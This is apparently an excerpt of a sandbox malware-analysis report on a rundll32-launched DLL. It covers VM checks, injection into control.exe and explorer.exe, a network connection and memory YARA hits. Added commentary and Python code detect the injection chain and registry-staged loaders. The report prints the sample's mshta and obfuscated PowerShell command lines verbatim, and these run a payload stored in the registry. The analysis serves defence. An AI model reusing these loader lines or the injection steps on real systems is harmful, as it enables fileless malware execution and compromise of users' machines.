Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\
Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\CkK@
Source: explorer.exe, 00000025.00000000.424617292.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.419520780.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000000.437682607.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: mshta.exe, 00000018.00000003.363685356.000002AE315B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: explorer.exe, 00000025.00000000.419693379.000000000814C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_04F6EC00
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F68FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_04F68FEC

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 176.10.119.68 80
                      Source: C:\Windows\SysWOW64\rundll32.exe; Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe; Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\System32\control.exe base: 7FF61B8E12E0
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\System32\control.exe base: E50000
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\System32\control.exe base: 7FF61B8E12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\explorer.exe base: 49E000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\explorer.exe base: 7FFC86661580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\explorer.exe base: 2960000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: C:\Windows\explorer.exe base: 7FFC86661580
                      Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 4A2000
                      Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 7FFC86661580
                      Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 2600000
                      Source: C:\Windows\System32\control.exe; Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe; Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe; Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe; Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe; Memory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe; Memory protected: unknown base: 7FFC86661580 protect: page execute read
                      Source: C:\Windows\explorer.exe; Memory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe; Memory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe; Memory protected: unknown base: 7FFC86661580 protect: page execute read
                      Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: C:\Windows\System32\control.exe base: E50000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe; Memory allocated: C:\Windows\explorer.exe base: 2600000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: PID: 3968 base: 49E000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: PID: 3968 base: 7FFC86661580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: PID: 3968 base: 2960000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Memory written: PID: 3968 base: 7FFC86661580 value: 40
                      Source: C:\Windows\System32\control.exe; Memory written: PID: 3968 base: 4A2000 value: 00
                      Source: C:\Windows\System32\control.exe; Memory written: PID: 3968 base: 7FFC86661580 value: EB
                      Source: C:\Windows\System32\control.exe; Memory written: PID: 3968 base: 2600000 value: 80
                      Source: C:\Windows\SysWOW64\rundll32.exe; Thread register set: target process: 2388
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread register set: target process: 3968
                      Source: C:\Windows\System32\control.exe; Thread register set: target process: 3968
                      Source: C:\Windows\explorer.exe; Thread register set: target process: 4168
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread created: C:\Windows\explorer.exe EIP: 86661580
                      Source: C:\Windows\System32\control.exe; Thread created: C:\Windows\explorer.exe EIP: 86661580
                      Source: C:\Windows\explorer.exe; Thread created: unknown EIP: 86661580
                      Source: C:\Windows\explorer.exe; Thread created: unknown EIP: 86661580
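The entries above are the raw building blocks of two injection chains. rundll32.exe allocates RWX memory in control.exe (base E50000), writes to it and then changes a thread context in PID 2388, which is thread hijacking rather than CreateRemoteThread. control.exe in turn allocates and writes into explorer.exe, flips the page at 7FFC86661580 to RWX, writes the byte EB there (a short jmp) and starts a remote thread whose start address the report prints as the 32-bit value 86661580. The Python below is an added example, not part of the Joe Sandbox report or tooling: it correlates such lines into per source/target chains and names the pattern each one shows. The sample lines are constructed from the entries above; the "; " separator between the source and the event is an assumption about how the report text was extracted, and the parser also accepts the run-together form and the trailing "Jump to behavior" link text.

```python
"""Correlate sandbox cross-process memory events into injection chains."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed input: a subset of the report's memory/thread entries (assumed
# extraction format; one line is left run-together and one keeps the link text
# to show that both forms parse).
SAMPLE_EVENTS = r"""
Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: C:\Windows\System32\control.exe base: E50000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\System32\control.exe base: E50000
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: C:\Windows\System32\control.exe base: 7FF61B8E12E0
Source: C:\Windows\SysWOW64\rundll32.exe; Thread register set: target process: 2388
Source: C:\Windows\System32\control.exe; Memory allocated: C:\Windows\explorer.exe base: 2600000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 4A2000
Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 7FFC86661580
Source: C:\Windows\System32\control.exe; Memory written: C:\Windows\explorer.exe base: 2600000
Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe; Memory written: PID: 3968 base: 7FFC86661580 value: EB
Source: C:\Windows\System32\control.exe; Thread register set: target process: 3968
Source: C:\Windows\System32\control.exe; Thread created: C:\Windows\explorer.exe EIP: 86661580Jump to behavior
"""

EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>[^;\s]+?)[;\s]*"
    r"(?P<kind>Memory allocated|Memory written|Memory protected|Thread register set|Thread created):\s*"
    r"(?P<rest>.*?)(?:Jump to behavior)?$"
)
HEX_RE = re.compile(r"(?:base|EIP):\s*([0-9A-Fa-f]+)")
PID_RE = re.compile(r"(?:PID|target process):\s*(\d+)")
VALUE_RE = re.compile(r"value:\s*([0-9A-Fa-f]{2})")


@dataclass
class Event:
    source: str
    kind: str
    target: str             # image path, or "pid:<n>" when the report only gives a PID
    address: Optional[str]  # hex from "base:" / "EIP:", upper-case, no 0x prefix
    rwx: bool               # the line carries "execute and read and write"
    value: Optional[str]    # first byte written, when the report shows it


def parse_events(text: str) -> List[Event]:
    """Turn report lines into Event records; lines of other kinds are ignored."""
    events: List[Event] = []
    for raw in text.splitlines():
        m = EVENT_RE.match(raw.strip())
        if not m:
            continue
        rest = m.group("rest")
        pid = PID_RE.search(rest)
        target = f"pid:{pid.group(1)}" if pid else rest.split()[0]
        addr = HEX_RE.search(rest)
        val = VALUE_RE.search(rest)
        events.append(Event(
            source=m.group("src"), kind=m.group("kind"), target=target,
            address=addr.group(1).upper() if addr else None,
            rwx="execute and read and write" in rest,
            value=val.group(1).upper() if val else None))
    return events


@dataclass
class Chain:
    rwx_alloc: Set[str] = field(default_factory=set)      # RWX allocations in the target
    written: Set[str] = field(default_factory=set)        # addresses written in the target
    rwx_protect: Set[str] = field(default_factory=set)    # existing pages flipped to RWX
    thread_starts: Set[str] = field(default_factory=set)  # start addresses of created threads
    context_set: bool = False                             # source changed some thread context


def build_chains(events: List[Event]) -> Dict[Tuple[str, str], Chain]:
    """Group events by (source image, target image)."""
    chains: Dict[Tuple[str, str], Chain] = defaultdict(Chain)
    ctx_sources = {e.source for e in events if e.kind == "Thread register set"}
    for e in events:
        # PID-only lines carry no image name, so they only feed the patch-byte map below.
        if e.kind == "Thread register set" or e.address is None or e.target.startswith("pid:"):
            continue
        c = chains[(e.source, e.target)]
        if e.kind == "Memory allocated" and e.rwx:
            c.rwx_alloc.add(e.address)
        elif e.kind == "Memory written":
            c.written.add(e.address)
        elif e.kind == "Memory protected" and e.rwx:
            c.rwx_protect.add(e.address)
        elif e.kind == "Thread created":
            c.thread_starts.add(e.address)
    for (src, _target), c in chains.items():
        c.context_set = src in ctx_sources
    return dict(chains)


def classify(chain: Chain, patch_bytes: Dict[str, str]) -> str:
    """Name the injection pattern a (source, target) chain shows."""
    executable = chain.rwx_alloc | chain.rwx_protect
    wrote_exec = chain.written & executable
    # The report prints a remote thread's start address as a 32-bit EIP, so it is
    # matched as a suffix of the 64-bit addresses seen in the write/protect entries.
    patched_start = sorted(a for a in wrote_exec
                           if any(a.endswith(eip) for eip in chain.thread_starts))
    if patched_start:
        addr = patched_start[0]
        verdict = "remote thread started inside memory the source wrote and made executable"
        if addr in patch_bytes:
            verdict += f"; first byte written at {addr} is {patch_bytes[addr]}"
            if patch_bytes[addr] == "EB":
                verdict += " (short jmp)"
        return verdict
    if wrote_exec and chain.context_set:
        return "thread hijack: executable memory written, then a thread context was changed"
    if wrote_exec:
        return "executable memory written in a foreign process, no execution seen"
    if chain.written:
        return "foreign memory write only"
    return "no injection indicators"


def report(text: str) -> Dict[Tuple[str, str], str]:
    """Verdict per (source, target) pair found in the report text."""
    events = parse_events(text)
    patches: Dict[str, Dict[str, str]] = defaultdict(dict)  # source -> address -> byte
    for e in events:
        if e.value and e.address:
            patches[e.source][e.address] = e.value
    return {key: classify(chain, patches[key[0]]) for key, chain in build_chains(events).items()}


if __name__ == "__main__":
    for (src, dst), verdict in report(SAMPLE_EVENTS).items():
        print(f"{src} -> {dst}: {verdict}")
```

The suffix match on the EIP matters in practice: the same 32-bit value 86661580 appears in the powershell.exe, control.exe and explorer.exe entries above, so a rule keyed on the full 64-bit address would miss the thread-creation step entirely.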
                      Source: unknown; Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"
                      Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
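The mshta and powershell command lines above are the sample's registry-staged loader. The HTA is passed inline as an about: URI, shrinks its window, reads JScript out of the TestLocal value under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E with WScript.Shell.RegRead and eval()s it; the PowerShell one-liner hides gp (Get-ItemProperty) and iex (Invoke-Expression) behind throw-away aliases, decodes the UrlsReturn value of the same key as ASCII and executes it. Nothing is written to disk, so the artefact a defender gets is the command line itself. The Python below is an added example and not part of the report: it resolves the on-the-fly aliases, flags the pattern and extracts the registry locations involved. The two malicious command lines are copied from the entries above, the benign comparison line is constructed, and the two-finding threshold is an assumption.

```python
"""Flag mshta/PowerShell command lines that execute a payload staged in a registry value."""
import re
from typing import Dict, List

# Constructed inputs: the two command lines from the report (verbatim) and one benign line.
MSHTA_CMDLINE = r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>'''
POWERSHELL_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))'''
BENIGN_CMDLINE = r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' | Select-Object ProductName"'''

# Built-in PowerShell aliases the sample hides behind throw-away names.
BUILTIN_ALIASES = {"gp": "Get-ItemProperty", "iex": "Invoke-Expression"}
ALIAS_RE = re.compile(r"new-alias\s+-name\s+([^\s;]+)\s+-value\s+([^\s;]+)", re.I)
# A registry path in either JScript (HKCU\\...) or PowerShell provider (HKCU:...) spelling.
REG_REF_RE = re.compile(r"HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)[:\\]+[^'\"\s)]+", re.I)


def resolve_aliases(cmdline: str) -> str:
    """Rewrite aliases defined on the command line itself back to the cmdlets they stand for."""
    resolved = cmdline
    for name, value in ALIAS_RE.findall(cmdline):
        real = BUILTIN_ALIASES.get(value.lower(), value)
        resolved = re.sub(r"(?<![\w-])" + re.escape(name) + r"(?![\w-])", real, resolved, flags=re.I)
    return resolved


def normalize_key(ref: str) -> str:
    """Collapse the JScript and PowerShell spellings so both refer to the key the same way."""
    ref = re.sub(r"^(HK\w+):", r"\1\\", ref, flags=re.I)   # HKCU:Software -> HKCU\Software
    return re.sub(r"\\+", r"\\", ref)                       # \\\ and \\ -> single backslash


def analyze(cmdline: str) -> Dict[str, object]:
    """Return the de-aliased command line, the findings, the registry keys named, and a verdict."""
    resolved = resolve_aliases(cmdline)
    low = resolved.lower()
    findings: List[str] = []
    if "mshta" in low and "about:" in low and "<script" in low:
        findings.append("mshta runs an inline HTA from an about: URI (no .hta file on disk)")
    if "resizeto(" in low:
        findings.append("HTA window resized to hide it")
    if ".regread(" in low:
        findings.append("WScript.Shell.RegRead pulls script text from the registry")
    if "eval(" in low:
        findings.append("eval() executes the string read at runtime")
    if ALIAS_RE.search(cmdline):
        findings.append("throw-away aliases defined for built-in cmdlets")
    if "get-itemproperty" in low and "getstring(" in low and "invoke-expression" in low:
        findings.append("registry value decoded and passed to Invoke-Expression")
    refs = sorted({normalize_key(m) for m in REG_REF_RE.findall(resolved)})
    return {
        "resolved": resolved,
        "findings": findings,
        "registry_refs": refs,
        "suspicious": len(findings) >= 2,  # assumed threshold
    }


if __name__ == "__main__":
    for line in (MSHTA_CMDLINE, POWERSHELL_CMDLINE, BENIGN_CMDLINE):
        result = analyze(line)
        print(result["suspicious"], result["findings"], result["registry_refs"])
```

Resolving the aliases first is what makes the PowerShell rule robust: the alias names (ltqefvure, vftdnxvda) are random per sample, but after substitution the line reads as Invoke-Expression over Get-ItemProperty, which is the stable shape worth matching. The normalized key from both command lines points at the same HKCU\Software\AppDataLow\Software\Microsoft\{GUID} location, which is where an incident responder should look for the staged payload.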
                      Source: explorer.exe, 00000025.00000000.432716315.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.410487415.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.446191269.0000000000688000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ProgmanEXE^
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.449384808.000000000814C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.437464495.000000000814C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                      Source: explorer.exe, 00000025.00000000.433090722.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.410508381.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.415389104.000000000069D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd4
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: WProgram Manager
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A13365 cpuid 2_2_04A13365
                      Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04F781F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_04F781F1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A176BB GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 2_2_04A176BB
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A16D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 2_2_04A16D78
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_04A13365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 2_2_04A13365

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
